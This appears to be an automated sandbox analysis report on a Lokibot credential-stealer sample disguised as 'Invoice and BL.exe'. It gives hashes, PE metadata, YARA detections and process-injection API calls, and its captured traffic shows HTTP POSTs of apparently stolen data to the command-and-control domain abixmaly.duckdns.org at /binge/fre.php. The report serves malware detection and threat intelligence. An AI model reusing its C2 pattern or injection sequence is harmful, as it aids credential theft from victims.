                                SHA-512: 27E36988F84BDFEE83F99FE2FCF1D98C3F6E4C3BFBC74958475B13243561016976D4F1998972B41C9D23CF5EE8307D84F0FE61711C140BD3D0E38E44A7403BFE
                                Malicious: false
                                Reputation: moderate, very likely benign file
                                Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.

                                Static File Info

                                General

                                File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit): 7.064655736923516
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Windows Screen Saver (13104/52) 0.07%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                File name: Invoice and BL.exe
                                File size: 530432
                                MD5: 3c7b342067f6142e6ed45551f5f60c50
                                SHA1: d83513aa4ac743b7fe0f7d1052a37b5ef1b50f60
                                SHA256: 419865b95d9a00faea2d00122baabd7c2ea0be23dd5d3f15eae589bb5a6beecd
                                SHA512: 33dcb9c1c0a5b7445c65baf93c2e84d2824a638e6a332b7f52c7a4b7b470e19bb75d28a47f43887ef85a1a593137e5e3805882e26607a4c00d9889760371aa8c
                                SSDEEP: 6144:szFdMVnEVM6k02GhNvpG+5FPx2eW1REnHhJZdSFAx7cLM7QBUWQMZFGV1R5:KFdM5X02iNv4sjWTGmY7/DMZFUR5
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..............-... ...@....@.. ....................................@................................

                                File Icon

                                Icon Hash: 00828e8e8686b000

                                Static PE Info

                                General

                                Entrypoint: 0x482d82
                                Entrypoint Section: .text
                                Digitally signed: false
                                Imagebase: 0x400000
                                Subsystem: windows gui
                                Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp: 0x6100F2E2 [Wed Jul 28 06:02:10 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version: v4.0.30319
                                OS Version Major: 4
                                OS Version Minor: 0
                                File Version Major: 4
                                File Version Minor: 0
                                Subsystem Version Major: 4
                                Subsystem Version Minor: 0
                                Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                (the bytes following the entry-point jump are zero padding, which disassembles as a long run of "add byte ptr [eax], al"; omitted here)

                                Data Directories

                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x82d30 | 0x4f | .text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x84000 | 0x5f0 | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0xc | .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                Sections

                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x2000 | 0x80d88 | 0x80e00 | False | 0.661054194956 | data | 7.07527531972 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc | 0x84000 | 0x5f0 | 0x600 | False | 0.434244791667 | data | 4.23356085492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc | 0x86000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                Name | RVA | Size | Type | Language | Country
                                RT_VERSION | 0x84090 | 0x360 | data | |
                                RT_MANIFEST | 0x84400 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                Imports

                                DLL | Import
                                mscoree.dll | _CorExeMain

                                Version Infos

                                Description | Data
                                Translation | 0x0000 0x04b0
                                LegalCopyright | Copyright Thomas ICHE 2011
                                Assembly Version | 1.0.0.0
                                InternalName | sH7BDA6.exe
                                FileVersion | 1.0.0.0
                                CompanyName | Thomas ICHE
                                LegalTrademarks |
                                Comments |
                                ProductName | NodeGraph Control
                                ProductVersion | 1.0.0.0
                                FileDescription | NodeGraph Control
                                OriginalFilename | sH7BDA6.exe

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Aug 3, 2021 23:25:48.240401983 CEST | 49735 | 80 | 192.168.2.3 | 192.169.69.26
                                Aug 3, 2021 23:25:48.546915054 CEST | 80 | 49735 | 192.169.69.26 | 192.168.2.3
                                Aug 3, 2021 23:25:48.547018051 CEST | 49735 | 80 | 192.168.2.3 | 192.169.69.26
                                Aug 3, 2021 23:25:48.549781084 CEST | 49735 | 80 | 192.168.2.3 | 192.169.69.26
                                Aug 3, 2021 23:25:48.989089012 CEST | 80 | 49735 | 192.169.69.26 | 192.168.2.3
                                Aug 3, 2021 23:25:49.217688084 CEST | 49736 | 80 | 192.168.2.3 | 192.169.69.26
                                Aug 3, 2021 23:25:49.590460062 CEST | 80 | 49736 | 192.169.69.26 | 192.168.2.3
                                Aug 3, 2021 23:25:49.590812922 CEST | 49736 | 80 | 192.168.2.3 | 192.169.69.26
                                Aug 3, 2021 23:25:49.594585896 CEST | 49736 | 80 | 192.168.2.3 | 192.169.69.26
                                Aug 3, 2021 23:25:50.064380884 CEST | 80 | 49736 | 192.169.69.26 | 192.168.2.3
                                Aug 3, 2021 23:25:50.286206007 CEST | 49737 | 80 | 192.168.2.3 | 192.169.69.26
                                Aug 3, 2021 23:25:50.621546030 CEST | 80 | 49737 | 192.169.69.26 | 192.168.2.3
                                Aug 3, 2021 23:25:50.621686935 CEST | 49737 | 80 | 192.168.2.3 | 192.169.69.26
                                Aug 3, 2021 23:25:50.624500036 CEST | 49737 | 80 | 192.168.2.3 | 192.169.69.26
                                Aug 3, 2021 23:25:51.116770983 CEST | 80 | 49737 | 192.169.69.26 | 192.168.2.3

                                UDP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Aug 3, 2021 23:25:01.965200901 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:01.990057945 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:02.812500000 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:02.838824987 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:03.623450041 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:03.655958891 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:04.799285889 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:04.824037075 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:05.609446049 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:05.635703087 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:06.394115925 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:06.426983118 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:07.545547962 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:07.570559978 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:08.219691992 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:08.252476931 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:09.019900084 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:09.055320978 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:11.024949074 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:11.052884102 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:11.832559109 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:11.860027075 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:12.767927885 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:12.804932117 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:13.611267090 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:13.646742105 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:14.420315027 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:14.454694033 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:15.235562086 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:15.270891905 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:15.931452036 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:15.959507942 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:17.930167913 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:17.958234072 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:32.462038040 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:32.502648115 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:36.951637030 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:36.992911100 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:47.089174032 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:47.133114100 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:48.091098070 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:48.221827030 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:49.182408094 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:49.215876102 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:50.152689934 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:50.283862114 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:54.193939924 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:54.226804018 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:56.135874987 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:56.182151079 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:25:58.320705891 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:25:58.361673117 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:26:00.458633900 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:26:00.492656946 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:26:37.320955992 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:26:37.372351885 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3
                                Aug 3, 2021 23:26:38.905750036 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
                                Aug 3, 2021 23:26:38.948692083 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3

                                DNS Queries

                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                Aug 3, 2021 23:25:48.091098070 CEST | 192.168.2.3 | 8.8.8.8 | 0x848a | Standard query (0) | abixmaly.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 3, 2021 23:25:49.182408094 CEST | 192.168.2.3 | 8.8.8.8 | 0xa9e8 | Standard query (0) | abixmaly.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 3, 2021 23:25:50.152689934 CEST | 192.168.2.3 | 8.8.8.8 | 0x7bff | Standard query (0) | abixmaly.duckdns.org | A (IP address) | IN (0x0001)

                                DNS Answers

                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                Aug 3, 2021 23:25:48.221827030 CEST | 8.8.8.8 | 192.168.2.3 | 0x848a | No error (0) | abixmaly.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001)
                                Aug 3, 2021 23:25:49.215876102 CEST | 8.8.8.8 | 192.168.2.3 | 0xa9e8 | No error (0) | abixmaly.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001)
                                Aug 3, 2021 23:25:50.283862114 CEST | 8.8.8.8 | 192.168.2.3 | 0x7bff | No error (0) | abixmaly.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001)

                                HTTP Request Dependency Graph

                                • abixmaly.duckdns.org

                                HTTP Packets

                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                0 | 192.168.2.3 | 49735 | 192.169.69.26 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Aug 3, 2021 23:25:48.549781084 CEST | 1329 | OUT | POST /binge/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: abixmaly.duckdns.org
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: D82FEB54
                                Content-Length: 190
                                Connection: close


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                1 | 192.168.2.3 | 49736 | 192.169.69.26 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Aug 3, 2021 23:25:49.594585896 CEST | 1336 | OUT | POST /binge/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: abixmaly.duckdns.org
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: D82FEB54
                                Content-Length: 190
                                Connection: close


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                2 | 192.168.2.3 | 49737 | 192.169.69.26 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Aug 3, 2021 23:25:50.624500036 CEST | 1337 | OUT | POST /binge/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: abixmaly.duckdns.org
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: D82FEB54
                                Content-Length: 163
                                Connection: close


                                Code Manipulations

                                Statistics

                                CPU Usage

                                Memory Usage

                                High Level Behavior Distribution

                                Behavior

                                System Behavior

                                General

                                Start time: 23:25:05
                                Start date: 03/08/2021
                                Path: C:\Users\user\Desktop\Invoice and BL.exe
                                Wow64 process (32bit): true
                                Commandline: 'C:\Users\user\Desktop\Invoice and BL.exe'
                                Imagebase: 0x370000
                                File size: 530432 bytes
                                MD5 hash: 3C7B342067F6142E6ED45551F5F60C50
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: .Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                General

                                Start time: 23:25:45
                                Start date: 03/08/2021
                                Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Wow64 process (32bit): true
                                Commandline: {path}
                                Imagebase: 0x830000
                                File size: 45152 bytes
                                MD5 hash: 2867A3817C9245F7CF518524DFD18F28
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Loki_1, Description: Loki Payload, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                Disassembly

                                Code Analysis

                                  Executed Functions

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: UP,K$UP,K$obb+
                                  • API String ID: 0-842833724

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 61,a
                                  • API String ID: 0-3525954982

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 61,a
                                  • API String ID: 0-3525954982

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: UlA
                                  • API String ID: 0-501016178

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0279B6F0
                                  • GetCurrentThread.KERNEL32 ref: 0279B72D
                                  • GetCurrentProcess.KERNEL32 ref: 0279B76A
                                  • GetCurrentThreadId.KERNEL32 ref: 0279B7C3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0279B6F0
                                  • GetCurrentThread.KERNEL32 ref: 0279B72D
                                  • GetCurrentProcess.KERNEL32 ref: 0279B76A
                                  • GetCurrentThreadId.KERNEL32 ref: 0279B7C3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0

                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02799951,00000800,00000000,00000000), ref: 02799B62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0

                                  APIs
                                  • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 00BD72D3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0

                                  APIs
                                  • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 00BD72D3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0

                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0279FE0A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0

                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 02795421
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0

                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02799951,00000800,00000000,00000000), ref: 02799B62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0

                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00BD77B5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0

                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00BD77B5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0279B93F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0279B93F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00BD762F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetThreadContext.KERNELBASE(?,00000000), ref: 00BD7567
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: ContextThread
                                  • String ID:
                                  • API String ID: 1591575202-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00BD762F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetThreadContext.KERNELBASE(?,00000000), ref: 00BD7567
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: ContextThread
                                  • String ID:
                                  • API String ID: 1591575202-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02799951,00000800,00000000,00000000), ref: 02799B62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 027998D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00BD76EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00BD76EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 027998D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 00BD8225
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 00BD8225
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
